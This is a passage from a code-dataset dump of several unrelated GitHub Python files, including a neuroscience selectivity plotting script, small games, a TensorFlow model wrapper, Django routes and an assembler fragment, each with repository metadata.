'#9b9b9b']\n linewidth_list = [2.5, 2.5, 2.5]\n linestyle_list = [(0, ()), (0, ()), (0, ())]\n line_list = ['PFC', 'Stri', 'IT']\n color = dict(zip(line_list, color_list))\n shade_color = dict(zip(line_list, shade_color_list))\n linewidth = dict(zip(line_list, linewidth_list))\n linestyle = dict(zip(line_list, linestyle_list))\n else:\n color_list = ['#317275', '#dbb356', '#3c3a7a', '#e08e4f', '#808080', '#ffb778', '#e08e4f', '#e08e4f', '#e08e4f',\n '#bd9842', '#282761', '#bd6b2d', '#ab3a0e', '#9e9e9e']\n shade_color_list = ['#49898c', '#e8c36d', '#504dab', '#f0a869', '#a8a8a8', '#eda768', '#f0a869', '#f0a869', '#f0a869',\n '#d1a94b', '#323073', '#db8340', '#c74816', '#a8a8a8']\n linewidth_list = [2, 2, 2.5, 2, 2, 2.5, 2, 2, 2,\n 2, 2, 2, 2, 2]\n # linestyle_list = [(0, ()), (0, (2, 1, 1, 1)), (0, ()), (0, (5, 4)), (0, (5, 1)), (0, ()), (0, (1, 1)), (0, (2, 1)), (0, (3, 1)),\n # (0, ()), (0, ()), (0, ()), (0, ()), (0, ())]\n linestyle_list = [(0, ()), (0, ()), (0, ()), (0, ()), (0, ()), (0, ()), (0, ()), (0, ()), (0, ()),\n (0, ()), (0, ()), (0, ()), (0, ()), (0, ())]\n line_list = ['Cue', 'PreDist', 'Gating', 'PostDist', 'Target', 'PreDist_PostDist', 'PostDist1', 'PostDist2', 'PostDist3',\n 'PreDist_From_To_PreDist', 'PreDist_From_To_Gating', 'Gating_From_To_PostDist', 'PostDist_From_To_PostDist', 'PostDist_From_To_Target']\n color = dict(zip(line_list, color_list))\n shade_color = dict(zip(line_list, shade_color_list))\n linewidth = dict(zip(line_list, linewidth_list))\n linestyle = dict(zip(line_list, linestyle_list))\n\n timebin_interval = TimebinInterval(timebin, timestep, t_start, t_end)\n\n\n\n\n ### TODO: polish later. Rushed\n # filter subject units\n units = units.loc[sessions.loc[sessions['Subject'].isin(subject_list)].index]\n # filter only single units of area of interest\n units.drop(units.loc[units['UnitNum'].eq(0) | units['RatingCode'].eq(7) |\n ~units['Area'].isin(area_list)].index, inplace=True)\n # convert units index into tuple\n units['tuple_index'] = units.apply(lambda row: row.name, axis=1)\n units.set_index('tuple_index', drop=True, inplace=True)\n ### TODO: improve all that\n filtered_inds = set(units.index)\n valid_inds = set.intersection(*[set([unit_ind for unit_ind, unit in selection_dict.items() if unit[x_cluster_label]['valid']]) for selection_dict in physiology_dict.values()])\n filtered_valid_inds = set.intersection(filtered_inds, valid_inds)\n\n selective_per_selection_inds = dict([(selection, set([unit_ind for unit_ind, unit in selection_dict.items() if bool(unit[x_cluster_label]['clusters'])]).intersection(filtered_valid_inds)) for selection, selection_dict in physiology_dict.items() if selection in selection_list])\n selective_population_inds = set.union(*[selection_ind for selection_ind in selective_per_selection_inds.values()])\n units_per_area_inds = dict([(area, set(units.loc[units['Area'].eq(area)].index).intersection(filtered_valid_inds)) for area in area_list])\n\n fig = plt.figure(figsize=(1.47, 2.91))\n ax = fig.add_subplot(1, 1, 1)\n\n selective_n = {}\n area_n = {}\n for area in area_list:\n\n selective_n = {}\n area_n = len(units_per_area_inds[area])\n\n for selection in selection_list:\n selective_n[selection] = len(set.intersection(selective_per_selection_inds[selection], units_per_area_inds[area])) / area_n * 100\n\n selective_n['All'] = len(set.intersection(*[set.intersection(selective_per_selection_inds[selection], units_per_area_inds[area])\n for selection in selection_list])) / area_n * 100\n selective_n['Any'] = len(set.union(*[set.intersection(selective_per_selection_inds[selection], units_per_area_inds[area])\n for selection in selection_list])) / area_n * 100\n\n print([el * 100 * area_n for el in selective_n.values()])\n plt.bar(range(len(selective_n)), selective_n.values())\n ax.set_title(area)\n ax.set_ylim(0, 35)\n ax.set_ylabel('Selective Units (%)')\n plt.box(False)\n\n return fig, ax\n\n\ndef selectivity_counts(subject_list, version_aov, version_fr, area, selection_list, selection_mode='Single'):\n\n # subject_list = ['Oscar', 'Gonzo']\n # version_aov = 'PresentedStimulus'\n # version_fr = 'ConcatFactor'\n # selection_list = ['PreDist', 'Gating', 'PostDist', 'Target']\n # area_list = ['PFC']\n # ylim_arg = None\n # title = ''\n\n area_list = [area]\n\n # version parameters\n v_aov_params = anova_version_aov_params(version_aov, version_fr)\n x_factors = v_aov_params['x_factors']\n x_cluster_label = x_factors[0]\n\n # init\n md = MetaData()\n db = md.db_base_loader(['sessions', 'units'])\n sessions, units = db['sessions'], db['units']\n\n anova = Anova(DataBase([]), {'aov': version_aov, 'fr': version_fr})\n anova.load_physiology_dict(cropped=True)\n physiology_dict = anova.physiology_dict\n\n if not bool(selection_list):\n selection_list = v_aov_params['selection_dict']['list']\n\n\n ### TODO: polish later. Rushed\n # filter subject units\n units = units.loc[sessions.loc[sessions['Subject'].isin(subject_list)].index]\n # filter only single units of area of interest\n units.drop(units.loc[units['UnitNum'].eq(0) | units['RatingCode'].eq(7) |\n ~units['Area'].isin(area_list)].index, inplace=True)\n # convert units index into tuple\n units['tuple_index'] = units.apply(lambda row: row.name, axis=1)\n units.set_index('tuple_index', drop=True, inplace=True)\n ### TODO: improve all that\n filtered_inds = set(units.index)\n valid_inds = set.intersection(*[set([unit_ind for unit_ind, unit in selection_dict.items() if unit[x_cluster_label]['valid']]) for selection_dict in physiology_dict.values()])\n filtered_valid_inds = set.intersection(filtered_inds, valid_inds)\n\n selective_per_selection_inds = dict([(selection, set([unit_ind for unit_ind, unit in selection_dict.items() if bool(unit[x_cluster_label]['clusters'])]).intersection(filtered_valid_inds)) for selection, selection_dict in physiology_dict.items() if selection in selection_list])\n selective_population_inds = set.union(*[selection_ind for selection_ind in selective_per_selection_inds.values()])\n units_per_area_inds = dict([(area, set(units.loc[units['Area'].eq(area)].index).intersection(filtered_valid_inds)) for area in area_list])\n\n\n selective_n = {}\n area_n = len(units_per_area_inds[area])\n\n for selection in selection_list:\n selective_n[selection] = len(set.intersection(selective_per_selection_inds[selection], units_per_area_inds[area])) / area_n * 100\n\n selective_n['All'] = len(set.intersection(*[set.intersection(selective_per_selection_inds[selection], units_per_area_inds[area])\n for selection in selection_list])) / area_n * 100\n selective_n['Any'] = len(set.union(*[set.intersection(selective_per_selection_inds[selection], units_per_area_inds[area])\n for selection in selection_list])) / area_n * 100\n\n key = selection_list[0] if selection_mode == 'Single' else selection_mode\n\n return round(selective_n[key] * area_n / 100), area_n\n\n\n# from statsmodels.stats.multitest import multipletests\n# from scipy.stats import binom_test\n# counts1 = [selectivity_counts(['Gonzo', 'Oscar'], 'PresentedStimulus', 'ConcatFactor', area, [stage])\n# for area, stage in product(['PFC', 'Stri', 'IT'], ['PreDist', 'Gating', 'PostDist', 'Target'])]\n# counts2 = [selectivity_counts(['Gonzo', 'Oscar'], 'GatedStimulus', 'ConcatFactor', area, [stage])\n# for area, stage in product(['PFC', 'Stri', 'IT'], ['Cue', 'PreDist', 'PostDist'])]\n# tests = [binom_test(*count, .05, alternative='greater') for count in counts1 + counts2]\n# multipletests(tests, method='fdr_bh')\n\n\n\ndef selectivity_count_intersectional_plot(subject_list, version_aov, version_fr, selection_list, area_list, toi):\n\n # subject_list = ['Oscar', 'Gonzo']\n # version_aov = 'PresentedStimulus'\n # version_fr = 'ConcatFactor'\n # selection_list = ['PreDist', 'Gating', 'PostDist']\n # area_list = ['PFC']\n # ylim_arg = None\n # title = ''\n # toi = None\n\n # version parameters\n v_aov_params = anova_version_aov_params(version_aov, version_fr)\n x_factors = v_aov_params['x_factors']\n x_cluster_label = x_factors[0]\n\n # init\n md = MetaData()\n db = md.db_base_loader(['sessions', 'units'])\n sessions, units = db['sessions'], db['units']\n\n anova = Anova(DataBase([]), {'aov': version_aov, 'fr': version_fr})\n anova.load_physiology_dict(cropped=True)\n physiology_dict = anova.physiology_dict\n\n if not bool(selection_list):\n selection_list = v_aov_params['selection_dict']['list']\n\n # plotting parameters\n\n units = units.loc[sessions.loc[sessions['Subject'].isin(subject_list)].index]\n # filter only single units of area of interest\n units.drop(units.loc[units['UnitNum'].eq(0) | units['RatingCode'].eq(7) |\n ~units['Area'].isin(area_list)].index, inplace=True)\n # convert units index into tuple\n units['tuple_index'] = units.apply(lambda row: row.name, axis=1)\n units.set_index('tuple_index', drop=True, inplace=True)\n filtered_inds = set(units.index)\n valid_inds = set.intersection(*[set([unit_ind for unit_ind, unit in selection_dict.items() if unit[x_cluster_label]['valid']]) for selection_dict in physiology_dict.values()])\n filtered_valid_inds = set.intersection(filtered_inds, valid_inds)\n\n def cluster_within_timerange(cluster_list, timerange):\n if timerange is None or (type(cluster_list) is not list and np.isnan(cluster_list)):\n return bool(cluster_list)\n else:\n return any([timerange[0] <= el <= timerange[1] for el in list(chain(*cluster_list))])\n\n selective_per_selection_inds = dict([(selection, set([unit_ind for unit_ind, unit in selection_dict.items() if cluster_within_timerange(unit[x_cluster_label]['clusters'], toi)]).intersection(filtered_valid_inds)) for selection, selection_dict in physiology_dict.items() if selection in selection_list])\n selective_population_inds = set.union(*[selection_ind for selection_ind in selective_per_selection_inds.values()])\n units_per_area_inds = dict([(area, set(units.loc[units['Area'].eq(area)].index).intersection(filtered_valid_inds)) for area in area_list])\n\n ax = {}\n for area in area_list:\n\n selective_n = {}\n selective_inds = {}\n area_n = len(units_per_area_inds[area])\n\n for selection in selection_list:\n selective_inds[selection] = set.intersection(selective_per_selection_inds[selection], units_per_area_inds[area])\n selective_n[selection] = len(selective_inds[selection])\n\n ax[area] = intersectional_pie([units_per_area_inds[area], selective_inds['PreDist'], selective_inds['Gating'], selective_inds['PostDist']],\n legend_show=True if area == 'PFC' else False, title_str=area)\n\n # OR INSTEAD\n # fig, ax = plt.subplots(1, 2, figsize=(10, 5))\n # title = ['Early (250-750ms)', 'Late (750-950ms)']\n # for toi, ax_i, title_i in zip([(100, 600), (600, 800)], ax, title):\n # [...]\n # for ii in range(5):\n # venn3([selective_inds['Gating'], selective_inds['PostDist'], selective_inds['PreDist']],\n # set_labels=['Gating', 'PostDist', 'PreDist'],\n # set_colors=['#3c3a7a', '#e08e4f', '#dbb356'], ax=ax_i)\n # ax_i.set_title(title_i)\n # fig.suptitle('Selectivity to Sensory Information on different time splits')\n\n return ax\n\n\ndef intersectional_pie(set_list, title_str='', legend_show=False, R=1):\n\n pi = math.pi\n # 0:abc, 1:ab, 2:ac, 3:bc, 4:a, 5:b, 6:c, 7:null\n color_list = ['#404040', '#5a914a', '#9c7038', '#754085', '#dbb356', '#3c3a7a', '#e08e4f', '#efefef']\n label_list = ['All', 'PreDist-Gating', 'PreDist-PostDist', 'Gating-PostDist', 'PreDist', 'Gating', 'PostDist', 'None']\n color_xy = itemgetter(4, 2, 6, 3, 5, 1)(color_list)\n\n omega, alpha, beta, gamma = set_list\n s_abc = set.intersection(alpha, beta).intersection(gamma)\n s_ab = set.intersection(alpha, beta).difference(s_abc)\n s_ac = set.intersection(alpha, gamma).difference(s_abc)\n s_bc = set.intersection(beta, gamma).difference(s_abc)\n s_a = alpha.difference(beta).difference(gamma)\n s_b = beta.difference(alpha).difference(gamma)\n s_c = gamma.difference(alpha).difference(beta)\n s_null = omega.difference(alpha).difference(beta).difference(gamma)\n\n a_omega = len(omega)\n a_abc = len(s_abc) * 5 / a_omega\n a_ab = len(s_ab) * 5 / a_omega\n a_ac = len(s_ac) * 5 / a_omega\n a_bc = len(s_bc) * 5 / a_omega\n a_a = len(s_a) * 5 / a_omega\n a_b = len(s_b) * 5 / a_omega\n a_c = len(s_c) * 5 / a_omega\n a_null = len(s_null) * 5 / a_omega\n\n a_xy = a_a + a_b + a_c + a_ab + a_ac + a_bc\n a_omega = len(omega)\n\n r_abc = (a_abc / pi) ** (1/2)\n r_xy = ((a_abc + a_xy) / pi) ** (1/2) - r_abc\n r_null = ((a_abc + a_xy + a_null) / pi) ** (1/2) - r_abc - r_xy\n R = r_abc + r_xy + r_null\n\n fig, ax = plt.subplots()\n ax.pie([1], radius=r_abc, colors=[color_list[0]], wedgeprops=dict(width=r_abc, edgecolor=(1, 1, 1, 0), linewidth=.33))\n pie_wedge_collection = ax.pie([a_a, a_ac, a_c, a_bc, a_b, a_ab], normalize=True, radius=r_xy + r_abc, colors=list(color_xy),\n wedgeprops=dict(width=r_xy, edgecolor=(1, 1, 1, 0), linewidth=.33))\n ax.pie([1], radius=R, colors=[color_list[-1]], wedgeprops=dict(width=r_null, edgecolor=(1, 1, 1, 0), linewidth=.33))\n\n\n ax.set(aspect='equal')\n legend_elements = [Line2D([0], [0], marker='o', color=(1, 1, 1, 0), label=l, markerfacecolor=c, markeredgecolor=(1, 1, 1, 0), markersize=12)\n for c, l in zip(color_list, label_list)]\n if legend_show:\n ax.legend(handles=legend_elements, loc='upper right', bbox_to_anchor=(1.35, 0.9), frameon=False, prop={'size': 9})\n plt.show()\n ax.set_title(title_str)\n\n return ax\n\n","repo_name":"pkollias/GatingInWorkingMemory","sub_path":"figures/code/plot_selective_counts.py","file_name":"plot_selective_counts.py","file_ext":"py","file_size_in_byte":15864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32262239745","text":"from sqlalchemy import (\n Column,\n Integer,\n Text,\n String,\n)\n\nimport sqlahelper\nDBSession = sqlahelper.get_session()\nBase = sqlahelper.get_base()\n\n#~ class User(Base):\n #~ __tablename__ = 'users'\n #~ __table_args__ = {'schema': 'user_administration', 'autoload': True}\n #~ id = Column(Integer, primary_key=True)\n\n","repo_name":"kalbermattenm/sitn_portal","sub_path":"sitn_portal/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3961446545","text":"from random import choice\r\n\r\n# the different topics u can choose from\r\nName = [\"SAM\", \"JOHN\", \"HARRY\"]\r\nGender = [\"BOY\", \"GIRL\", \"MALE\", \"FEMALE\"]\r\nColor = [\"RED\", \"BLUE\", \"GREEN\", \"YELLOW\"]\r\nSizes = [\"SMALL\", \"MEDIUM\", \"LARGE\"]\r\nClothes = [\"PANTS\", \"SHIRTS\", \"SOCKS\"]\r\nCurrency = [\"YEN\", \"RUPIAH\", \"DOLLAR\", \"DONG\", \"POUND\"]\r\n\r\n# allocating the topic so we can choose a topic\r\nAll_Topics = [\"Name\", \"Gender\", \"Color\", \"Sizes\", \"Clothes\", \"Currency\"]\r\nAll_Topics_Dict = {\r\n \"Names\":Name,\"Gender\":Gender,\"Color\":Color,\"Sizes\":Sizes,\"Clothes\":Clothes,\"Currency\":Currency,\r\n}\r\n\r\n# all of the possible actions\r\ndef Correct_Guess(P1):\r\n index = 0\r\n GC = 0\r\n for i in Word:\r\n if P1!=i:\r\n index +=1\r\n else:\r\n Display[index]=i\r\n index +=1\r\n \r\n index = 0\r\n for Each_Letter in Display:\r\n if Each_Letter == Word[index]:\r\n GC += 1\r\n index +1\r\n else:\r\n index +=1\r\n Unused_Letters.remove(P1)\r\n return GC\r\n\r\ndef Already_Guess():\r\n print(\"Letter already guessed\")\r\n\r\ndef Invalid_Guess():\r\n print(\"Please input letter\")\r\n\r\ndef incorrect_Guess(P1,LL):\r\n for i in Unused_Letters:\r\n if P1 == i:\r\n Unused_Letters.remove(i)\r\n \r\n LL -1\r\n print(\"Wrong guess u dumbo\")\r\n return LL\r\n\r\nwhile True:\r\n # choose topics\r\n Topic = choice(All_Topics)\r\n for Each_Key in All_Topics_Dict.keys():\r\n if Topic == Each_Key:\r\n print(\"Topic:\",Topic)\r\n Topic = All_Topics_Dict[Each_Key]\r\n Word = choice(Topic)\r\n #print(Word)\r\n print(\"Word is \" +str(len(Word))+\" letters long.\")\r\n \r\n Display = []\r\n for i in Word:\r\n Display.append(\"_\")\r\n print(Display)\r\n \r\n Lives_Left = 10\r\n Guessed_Currently = 0\r\n Unused_Letters = []\r\n Valid_Letters = []\r\n for i in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\":\r\n Unused_Letters.append(i)\r\n Valid_Letters.append(i)\r\n \r\n while Lives_Left != 0 and Guessed_Currently != len(Word):\r\n P1 = input(\"Guess here\")\r\n P1 = P1.upper\r\n if P1 in Word and P1 in Unused_Letters:\r\n Guessed_Currently = Correct_Guess(P1)\r\n \r\n elif P1 not in Valid_Letters:\r\n Invalid_Guess()\r\n \r\n elif P1 in Valid_Letters and P1 in Unused_Letters:\r\n Already_Guess()\r\n \r\n elif P1 in Unused_Letters and P1 not in Word:\r\n Lives_Left = incorrect_Guess(P1,Lives_Left)\r\n \r\n print()\r\n print(Lives_Left,\"Lives Left\")\r\n print(Guessed_Currently, \"/\", len(Word), \"Letters Guessed\")\r\n print(Display)\r\n \r\n print()\r\n if Lives_Left == 0:\r\n print(\"word was\", Word, \".\")\r\n print(\"better luck next time bozo\")\r\n \r\n else:\r\n print(\"You got it nice job\")\r\n\r\n Replay = input(\"Press the Enter key to play again, Press N to exit\")\r\n if Replay == \"n\" or Replay == \"N\":\r\n break\r\n \r\n","repo_name":"frederiksjr/Programmering-portfolie","sub_path":"Hangman.py","file_name":"Hangman.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17231845915","text":"from ccprojects.models import ProjectChange,QuestionGroup,AnswerGroup\nfrom django.db.models.aggregates import Max\nfrom ccutilities.arangodb_utils import hierarchy\nfrom datetime import datetime,timedelta\n#from dateutil.relativedelta import relativedelta\nimport pandas as pd\nimport numpy as np\nfrom pandasql import sqldf\nfrom ccutilities.utilities import residenttenant\nfrom django.db import connection\nfrom ccreporting.models import ScoringDSet\nfrom django.db.models import Max\nfrom django.db.models.functions import Length\n\n\ndef score(impact_type,ampp):\n if impact_type=='Training':\n if ampp >= 1 and ampp <= 20:\n score = ampp*0.01\n elif ampp >= 20 and ampp <= 122:\n score = ampp*0.05\n elif ampp >= 123 and ampp <= 226:\n score = ampp*0.075\n else:\n score = 30\n elif impact_type=='Communication':\n if ampp >= 1 and ampp <= 12:\n score = ampp*0.01\n elif ampp >= 13 and ampp <= 113:\n score = ampp*0.05\n elif ampp >= 114 and ampp <= 215:\n score = ampp*0.075\n else:\n score = 30\n elif impact_type=='Experiment':\n if ampp >= 1 and ampp <= 8:\n score = ampp*0.01\n elif ampp >= 9 and ampp <= 101:\n score = ampp*0.05\n elif ampp >= 102 and ampp <= 206:\n score = ampp*0.075\n else:\n score = 30\n elif impact_type=='Specialist':\n if ampp >= 1 and ampp <= 2:\n score = ampp*0.01\n elif ampp >= 3 and ampp <= 91:\n score = ampp*0.05\n elif ampp >= 92 and ampp <= 199:\n score = ampp*0.075\n else:\n score = 30\n elif impact_type=='Customer':\n if ampp >= 1 and ampp <= 84:\n score = ampp*0.05\n elif ampp >= 85 and ampp <= 192:\n score = ampp*0.075\n else:\n score = 30\n elif impact_type=='Implement':\n if ampp >= 1 and ampp <= 75:\n score = ampp*0.05\n elif ampp >= 76 and ampp <= 184:\n score = ampp*0.075\n else:\n score = 30\n else:\n score = 0\n return score\n\n","repo_name":"zafroth-devel/Caracus","sub_path":"cccalculate/scoring_analysis.py","file_name":"scoring_analysis.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72119667753","text":"###########################\n# Reset working directory #\n###########################\nimport os\nos.chdir(\"/home/btrabucco/research/multiattend\")\n###########################\n# MultiAttend Package.... #\n###########################\nfrom multiattend.model.tf_model_args import TFModelArgs\nfrom multiattend.model.tf_model_utils import TFModelUtils\nimport numpy as np\n\nclass TFModel(object):\n\n def __init__(\n self):\n self.tf_model_args = TFModelArgs()\n self.tf_model_utils = TFModelUtils()\n self.graph_is_built = False\n \n def initialize(\n self,\n load_dataset_fn):\n args = self.tf_model_args()\n self.tf_model_utils.set_args(args)\n if not self.graph_is_built:\n self.inputs_batch, self.labels_batch = self.tf_model_utils.load_dataset_fn(\n load_dataset_fn)\n self.tf_model_utils.build_parameters()\n self.tensor_encoded = self.tf_model_utils.encode(\n self.inputs_batch)\n self.tensor_logits, self.tensor_probs = self.tf_model_utils.decode(\n self.tensor_encoded)\n self.loss = self.tf_model_utils.loss_function(\n self.tensor_logits, \n self.labels_batch)\n self.gradient = self.tf_model_utils.gradient(\n self.loss)\n self.tf_model_utils.finalize_graph()\n self.graph_is_built = True\n self.tf_model_utils.run_initialize()\n \n def train(\n self,\n num_iterations):\n (_grad, \n actual_loss, \n actual_step,\n actual_inputs,\n actual_probs, \n actual_labels) = self.tf_model_utils.run_operation([\n self.gradient, \n self.loss,\n self.tf_model_utils.global_step,\n self.inputs_batch, \n self.tensor_probs, \n self.labels_batch], iterations=num_iterations)\n actual_inputs = np.argmax(actual_inputs, axis=-1)\n actual_probs = np.argmax(actual_probs, axis=-1)\n actual_labels = np.argmax(actual_labels, axis=-1)\n \n correct_predictions = 0\n total_predictions = 0\n for a, b in zip(\n actual_probs.flatten().tolist(), \n actual_labels.flatten().tolist()):\n total_predictions += 1\n if a == b:\n correct_predictions += 1\n actual_accuracy = correct_predictions / total_predictions\n \n np.set_printoptions(precision=1)\n \n print(\n \"Iteration: %d\" % actual_step,\n \"Loss: %.2f\" % actual_loss, \n \"Accuracy: %.2f\" % actual_accuracy,\n \"Input: %s\" % str(actual_inputs[0, :]),\n \"Prediction: %s\" % str(actual_probs[0, :]),\n \"Label: %s\" % str(actual_labels[0, :]))\n return {\n \"loss\": actual_loss, \n \"accuracy\": actual_accuracy, \n \"inputs\": actual_inputs, \n \"probs\": actual_probs,\n \"labels\": actual_labels}\n \n def test(\n self):\n (actual_inputs,\n actual_probs, \n actual_labels) = self.tf_model_utils.run_operation([\n self.inputs_batch, \n self.tensor_probs, \n self.labels_batch], iterations=1)\n actual_inputs = np.argmax(actual_inputs, axis=-1)\n actual_probs = np.argmax(actual_probs, axis=-1)\n actual_labels = np.argmax(actual_labels, axis=-1)\n \n correct_predictions = 0\n total_predictions = 0\n for a, b in zip(\n actual_probs.flatten().tolist(), \n actual_labels.flatten().tolist()):\n total_predictions += 1\n if a == b:\n correct_predictions += 1\n actual_accuracy = correct_predictions / total_predictions\n return {\n \"accuracy\": actual_accuracy, \n \"inputs\": actual_inputs, \n \"probs\": actual_probs,\n \"labels\": actual_labels}\n \n def save(\n self):\n self.tf_model_utils.run_checkpoint()","repo_name":"brandontrabucco/multiattend","sub_path":"multiattend/model/tf_model.py","file_name":"tf_model.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7696632503","text":"import random\n\n\ndef is_valid_right(r):\n if r.isdigit() and int(r) > 0:\n return True\n return False\n\n\ndef is_valid(s):\n if s.isdigit() and 1 <= int(s) <= int(right_n):\n return True\n return False\n\n\ndef right_num():\n print('Укажите правую границу числа:')\n global right_n\n while True:\n right_n = input()\n if is_valid_right(right_n):\n return int(right_n)\n else:\n print('Укажите положительное число от 1:')\n\n\ndef input_num():\n print('Введите число от 1 до ', right_n, ':', sep='')\n while True:\n predict_num = input()\n if is_valid(predict_num):\n return int(predict_num)\n else:\n print('А может быть все-таки введем целое число от 1 до ', right_n, '?', sep='')\n\n\ndef game(new_game=True):\n if new_game:\n print('Добро пожаловать в числовую угадайку')\n num = random.randint(1, right_num())\n try_predict = 0\n flag = False\n final_result = 0\n\n while True:\n if flag:\n break\n\n pr = input_num()\n try_predict += 1\n\n while pr > 0:\n if pr > num:\n print('Слишком много, попробуйте еще раз')\n pr = input_num()\n try_predict += 1\n continue\n\n elif pr < num:\n print('Слишком мало, попробуйте еще раз')\n pr = input_num()\n try_predict += 1\n continue\n\n else:\n if final_result == 0:\n print('Вы угадали, поздравляем!')\n print('Количество попыток:', try_predict)\n final_result += 1\n again = input('Вы хотите сыграть еще? (Напишите \"y\" - да или \"n\" - нет): ')\n if again == 'y':\n game(new_game=False)\n elif again == 'n':\n print('Спасибо, что играли в числовую угадайку. Еще увидимся...')\n flag = True\n break\n else:\n print('Введите \"y\" - да или \"n\" - нет')\n\n\ngame()\n","repo_name":"EvgeniiyaR/game_guess_number","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15190335066","text":"lista = []\njogador = {}\ngols = []\nwhile True:\n print('-'*30)\n jogador['nome'] = str(input('Nome do Jogador: '))\n n = int(input(f'Quantas partidas {jogador[\"nome\"]} jogou? '))\n for c in range(0, n):\n gols.append(int(input(f'Quantos gols na partida {c+1}? ')))\n jogador['gols'] = gols[:]\n jogador['total'] = sum(gols)\n lista.append(jogador.copy())\n gols.clear()\n while True:\n resp = str(input('Deseja continuar? [S/N] ')).strip().upper()[0]\n if resp in 'SN':\n break\n print('ERRO! Responda apenas S ou N.')\n if resp == 'N':\n break\nprint('-'*40)\nprint(f'{\"Cod\":<3} {\"Nome\":<15}{\"Gols\":<15}{\"Total\":<15}')\nprint('-'*40)\nfor c, valor in enumerate(lista):\n print(f'{c:>3} {valor[\"nome\"]:<15}{str(valor[\"gols\"]):<15}{valor[\"total\"]:<15}')\nprint('-'*40)\n\nwhile True:\n resp = int(input('Mostrar dados de qual jogador? (999 para sair) '))\n if 0 <= resp <= (len(lista)-1) or resp == 999:\n if resp == 999:\n break\n print(f'-- LEVANTAMENTO DO JOGADOR {lista[resp][\"nome\"]}:')\n for c, valor in enumerate(lista[resp][\"gols\"]):\n print(f' No jogo {c+1} fez {valor} gols.')\n else:\n print(f'ERRO! Não existe jogador com código {resp}! Tente novamente.')\n print('-' * 35)\nprint('<< VOLTE SEMPRE >>')\n","repo_name":"VitorFRodrigues/Python-curso","sub_path":"PythonExercicios/ex095.py","file_name":"ex095.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31655271016","text":"from datetime import datetime\nfrom recipe import Recipe\n\nclass Book:\n def __init__(self, name):\n self.name = name\n self.creation_date = datetime.now()\n self.last_update = datetime.now()\n self.recipes_list = {\"entrante\": [], \"comida\": [], \"postre\": []}\n\n def get_recipe_by_name(self, name):\n \"\"\"Imprime la receta con el nombre name y devuelve la instancia\"\"\"\n for recipe_type in self.recipes_list:\n for recipe in self.recipes_list[recipe_type]:\n if recipe.name == name:\n print(recipe)\n return recipe\n print(f\"No se encontró ninguna receta con el nombre {name}\")\n return None\n\n def get_recipes_by_types(self, recipe_type):\n \"\"\"Devuelve todas las recetas dado un recipe_type\"\"\"\n if recipe_type not in self.recipes_list:\n print(f\"No se encontró ningún tipo de receta con el nombre {recipe_type}\")\n return []\n recipes = self.recipes_list[recipe_type]\n for recipe in recipes:\n print(recipe)\n return recipes\n\n def add_recipe(self, recipe):\n \"\"\"Añade una receta al libro y actualiza last_update\"\"\"\n if not isinstance(recipe, Recipe):\n raise ValueError(\"Debe añadir una instancia de la clase Recipe\")\n self.recipes_list[recipe.recipe_type].append(recipe)\n self.last_update = datetime.now()\n print(\"Updated at: \", self.last_update)\n\n","repo_name":"andonimarz/Python-42AI","sub_path":"module_01/ex00/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70528232554","text":"from django.conf.urls import url\n\nfrom .views import (\n ContactFormView,\n ForumView,\n TopView,\n)\n\nurlpatterns = [\n url(r'^$',\n TopView.as_view(),\n name='top'\n ),\n url(r'^contact$',\n ContactFormView.as_view(),\n name='contact'\n ),\n url(r'^forum$',\n ForumView.as_view(),\n name='forum'\n ),\n]\n","repo_name":"garigari-kun/itsuiku","sub_path":"src/home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38826329504","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 19 10:22:36 2020\r\n\r\n@author: Kareem Omar\r\n\"\"\"\r\nimport os\r\nimport numpy as np\r\nimport sys\r\ndef fix_length_16(assembledline: str) -> str: #append zeros on right of string to fill 16\r\n diff = 16 - len(assembledline)\r\n if(diff == 0):\r\n return assembledline\r\n fixed = ''\r\n for i in range (diff):\r\n fixed += '0'\r\n fixed= assembledline + fixed\r\n return fixed\r\n\r\ndef left_fix_length_20(assembledline: str) -> str: #append zeros on left of string to fill 16\r\n # assembledline.replace(\"0b\", \"\", 1)\r\n diff = 20 - len(assembledline)\r\n if(diff == 0):\r\n return assembledline\r\n fixed = ''\r\n for i in range (diff):\r\n fixed += '0'\r\n fixed+= assembledline\r\n return fixed\r\n\r\nOP_Codes = {'NOT':'000001',\r\n 'INC':'000010',\r\n 'DEC':'000011',\r\n 'OUT':'000100',\r\n 'IN':'000101',\r\n 'SWAP':'000110',\r\n 'ADD':'000111',\r\n 'SUB':'001000',\r\n 'AND':'001001',\r\n 'OR':'001010',\r\n 'PUSH':'001011',\r\n 'POP':'001100',\r\n 'JZ':'001101',\r\n 'JMP':'001110',\r\n 'CALL':'001111',\r\n 'SHL':'010000',\r\n 'SHR':'010001',\r\n 'LDM':'010010',\r\n 'IADD':'010011',\r\n 'LDD':'010100',\r\n 'STD':'010101',}\r\n\r\nRegisters = {'R0':'000',\r\n 'R1':'001',\r\n 'R2':'010',\r\n 'R3':'011',\r\n 'R4':'100',\r\n 'R5':'101',\r\n 'R6':'110',\r\n 'R7':'111',}\r\n\r\nOutputAssembledLines = {}\r\nif (len(sys.argv)>1):\r\n readfile=(sys.argv[1])\r\nelse:\r\n 